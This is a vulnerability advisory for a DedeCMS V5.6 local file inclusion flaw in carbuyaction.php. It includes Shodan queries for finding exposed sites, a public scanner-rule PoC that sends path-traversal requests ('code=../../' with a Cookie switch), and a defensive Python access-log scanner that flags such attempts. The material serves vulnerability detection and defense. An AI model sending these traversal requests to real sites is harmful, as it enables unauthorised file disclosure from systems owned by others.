dedecms-carbuyaction-fileinclude: DedeCmsV5.6 Carbuyaction Fileinclude

Date: 2025-09-01 | Affected software: DedeCmsV5.6 | POC: public

Vulnerability description

A local file inclusion vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to retrieve the content of locally stored files through the 'code' parameter.

Shodan query: http.html:"power by dedecms" || title:"dedecms"
app="DedeCMS"

PoC code [public]

id: dedecms-carbuyaction-fileinclude

info:
    name: DedeCmsV5.6 Carbuyaction Fileinclude
    author: harris2015(https://github.com/harris2015)
    severity: high
    verified: true
    description: |
        A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
        shodan-query: http.html:"power by dedecms" || title:"dedecms"
        app="DedeCMS"
    reference:
        - https://www.cnblogs.com/milantgh/p/3615986.html

rules:
    r0:
        request:
            method: GET
            path: /plus/carbuyaction.php?dopost=return&code=../../
            headers:
                Cookie: code=alipay
            follow_redirects: true
        expression: response.status == 200
    r1:
        request:
            method: GET
            path: /plus/carbuyaction.php?dopost=return&code=../../
            headers:
                Cookie: code=cod
            follow_redirects: true
        expression: response.status == 200 && response.body.bcontains(bytes("Cod::respond()"))
expression: r0() && r1()
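The two rules above both send a GET to /plus/carbuyaction.php with dopost=return and a traversal sequence in the code parameter, so a web-server access log is enough to spot attempts (the Cookie header the rules set is not in a standard access log and is not needed for detection). The following defender-side scanner is an added example, not part of the PoC above or of DedeCMS: it parses combined-format access log lines (constructed sample lines, not real traffic), decodes the query string twice so single- and double-URL-encoded "../" are caught, and flags requests that match the endpoint, action and traversal pattern, then counts hits per source address.

```python
"""Access-log detection for the carbuyaction.php 'code' traversal (added example).
Assumes the combined log format; sample lines below are constructed, not real traffic."""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines: three traversal attempts (plain, URL-encoded,
# fully percent-encoded) from one address, plus two benign requests.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Sep/2025:10:00:01 +0000] "GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.10 - - [01/Sep/2025:10:00:02 +0000] "GET /plus/carbuyaction.php?dopost=return&code=..%2F..%2F HTTP/1.1" 200 512 "-" "curl/8.0"
198.51.100.7 - - [01/Sep/2025:10:00:03 +0000] "GET /plus/carbuyaction.php?dopost=return&code=alipay HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Sep/2025:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.10 - - [01/Sep/2025:10:00:05 +0000] "GET /plus/carbuyaction.php?dopost=return&code=%2e%2e%2f%2e%2e%2f HTTP/1.1" 200 512 "-" "curl/8.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

VULN_PATH = "/plus/carbuyaction.php"


def has_traversal(value: str) -> bool:
    """True if the value contains a '..' path segment after up to two rounds of
    URL decoding (catches ../, ..%2F and %2e%2e%2f as well as double encoding)."""
    decoded = unquote(unquote(value)).replace("\\", "/")
    return any(segment == ".." for segment in decoded.split("/"))


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs performs the first URL decode of each parameter value.
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def is_carbuyaction_traversal(rec) -> bool:
    """Match the request shape used by the rules: endpoint, dopost=return, '..' in code."""
    if not rec["path"].endswith(VULN_PATH):
        return False
    if rec["params"].get("dopost", [""])[0] != "return":
        return False
    return any(has_traversal(v) for v in rec["params"].get("code", []))


def scan_log(text: str):
    """Return one finding per log line that looks like an exploitation attempt."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and is_carbuyaction_traversal(rec):
            findings.append(
                {"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"], "target": rec["target"]}
            )
    return findings


def offenders(findings):
    """Count findings per source address for triage."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} status={h['status']} {h['target']}")
    print("attempts per source:", dict(offenders(hits)))
```

A 200 status on a flagged line is not proof the file was disclosed (the PoC's second rule additionally checks the body for "Cod::respond()"), so treat findings as attempts to investigate; the path check uses endswith so installations mounted under a sub-directory are still matched.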
